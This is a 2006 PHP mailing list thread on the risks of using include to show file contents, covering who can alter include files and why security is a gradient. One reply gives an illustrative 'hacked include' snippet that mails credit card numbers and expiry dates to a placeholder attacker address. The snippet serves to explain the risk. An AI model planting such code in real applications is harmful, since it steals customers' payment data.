On Mon, November 20, 2006 9:44 am, tedd wrote:
> At 11:24 AM +0000 11/20/06, Stut wrote:
>>Ford, Mike wrote:
>>>My preference would be the include, but all of the options you've
>>>been given would do the job one way or another.
>>>
>>
>>Using include for this is potentially dangerous since it will
>>execute any PHP code contained within the file. Only use include if
>>you are absolutely sure you trust the content of the files you are
>>displaying.
>
> To all:
>
> I understand that an include file will be executed "as-is", but how
> can someone change one of my includes? On my virtual host, I have to
> jump through ftp hoops (i.e., change permissions) to write a file and
> that's me knowing the logon and password. How does someone hack
> through that?
There are too many variables here to be sure who was saying what, but
consider that it's not just a question of them executing code they
want, but executing it in the context of YOUR web application.
For example:
<?php
//hacked include file:
mail('badguy@xxxxxxxxxxx', "$cc_number|$expiration", "");
//rest of "normal" include file below
?>
> And if they could hack through that, then nothing is secure including
> includes, right? If the evil doer has gone that far, then why not
> just run the evil code and be done with it, why screw around with
> includes, which may, or may not, be executed?
>
> What am I not getting here?
>
> Also, aren't there any safe methods for using includes?
You're not thinking correctly yet. :-)
It's not like "safe" (i.e., "security") is an on/off switch.
It's a gradient.
Your host making you jump through chmod hoops in FTP probably makes
most things more secure for you and yours.
But if a Bad Guy gets 'root' access on the server, your chmod doesn't
mean diddly-squat.
> For example, one could define a variable in an include and then check
> if it's defined in the calling code -- if it's defined then run, if
> not then exit. That is not fool-proof -- but it should stop someone
> from completely replacing your include code with theirs.
It's not really much of a barrier, but if there is a specific concern
with include files being alterable by untrusted users, I suppose it
might catch a particularly stupid untruested user...
I'd think they'd find/notice the size restriction rather quickly,
however, and subvert it too quickly for it to be generally useful and
worth doing.
--
Some people have a "gift" link here.
Know what I want?
I want you to buy a CD from some starving artist.
http://cdbaby.com/browse/from/lynch
Yeah, I get a buck. So?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
